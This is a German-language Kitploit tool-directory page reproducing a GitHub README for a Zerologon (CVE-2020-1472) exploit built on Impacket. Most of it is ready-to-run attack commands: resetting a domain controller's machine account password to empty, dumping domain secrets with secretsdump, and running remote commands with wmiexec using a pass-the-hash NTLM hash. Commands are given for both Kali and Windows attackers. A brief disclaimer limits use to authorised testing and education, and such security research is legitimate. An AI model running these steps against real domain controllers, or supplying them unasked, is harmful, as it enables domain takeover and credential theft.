Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
Tools/GitHubGitHub/tuancui22/zerologonwithimpacket-cve2020-1472
Privilege EscalationPasswortangriffeSchwachstellenanalyseExploitationLaterale BewegungPost-ExploitationPenetrationstestsLernen & Bildung

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
GitHub
tuancui22/zerologonwithimpacket-cve2020-1472

ZerologonWithImpacket-CVE2020-1472

Ein praktischer Proof-of-Concept für CVE-2020-1472 (Zerologon) unter Verwendung der Impacket-Bibliothek zur Ausnutzung der Netlogon-Schwachstelle und Durchführung nicht autorisierten Domänencontroller-Zugriffs.

Repository anzeigen
12vor 1 JahrNoch nicht geprüft

Zerologon und Impacket Kombinations-Exploit (CVE-2020-1472)

Dieses Repository enthält eine aktualisierte Implementierung (2024) des Zerologon-Exploits in Kombination mit Impacket-Tools, um CVE-2020-1472 (Zerologon) auszunutzen. Der Exploit zielt auf Windows Server-Umgebungen ab, um Maschinenkontopasswörter zu manipulieren und laterale Bewegungen durchzuführen.

Funktionen

  • Nutzt CVE-2020-1472 (Zerologon) aus, um das Maschinenkontopasswort des Ziels auf eine leere Zeichenfolge zu setzen.
  • Nutzt Impacket-Tools zum Auslesen von Anmeldeinformationen und Ausführen von Befehlen auf dem Opfersystem.

Voraussetzungen

  1. Python 3.x
  2. Installieren Sie die erforderlichen Abhängigkeiten durch Ausführen von:
    root@kitploit:~
    pip install -r requirements.txt
    

Verwendung

Beispielszenario

  • Opfer: Windows Server 2016
  • Angreifer: Kali Linux (oder Windows-System)

Exploit-Befehle (Kali Linux)

  1. Setzen des Maschinenkontopassworts auf eine leere Zeichenfolge:
    root@kitploit:~
    python3 set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
    
  2. Auslesen von Geheimnissen vom Domain Controller:
    root@kitploit:~
    python3 secretsdump.py -just-dc tancongmang/WIN-C9PAHHGJN91\[email protected]
    
  3. Ausführen von Befehlen auf dem Opfersystem:
    root@kitploit:~
    python3 wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
    

Exploit-Befehle (Windows-Angreifer)

  1. Setzen des Maschinenkontopassworts auf eine leere Zeichenfolge:
    root@kitploit:~
    python set_empty_pw.py WIN-C9PAHHGJN91 192.168.40.145
    
  2. Auslesen von Geheimnissen vom Domain Controller:
    root@kitploit:~
    python secretsdump.py -just-dc "tancongmang/[email protected]"
    
  3. Ausführen von Befehlen auf dem Opfersystem:
    root@kitploit:~
    python wmiexec.py tancongmang/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:579da618cfbfa85247acf1f800a280a4
    

Hinweise

  • Ersetzen Sie WIN-C9PAHHGJN91 und 192.168.40.145 durch den tatsächlichen Hostnamen und die IP-Adresse des Ziels.
  • Stellen Sie sicher, dass Sie vor der Nutzung dieses Tools über die entsprechende Berechtigung verfügen.
  • Dieses Tool dient ausschließlich Bildungs- und Penetrationstest-Zwecken.

Haftungsausschluss

Nutzen Sie dieses Tool verantwortungsvoll. Die unbefugte Nutzung dieses Tools zum Ausnutzen von Systemen ohne explizite Erlaubnis ist illegal und unethisch. Die Autoren übernehmen keine Verantwortung für Missbrauch oder Schäden, die durch dieses Tool verursacht werden.

Tool herunterladen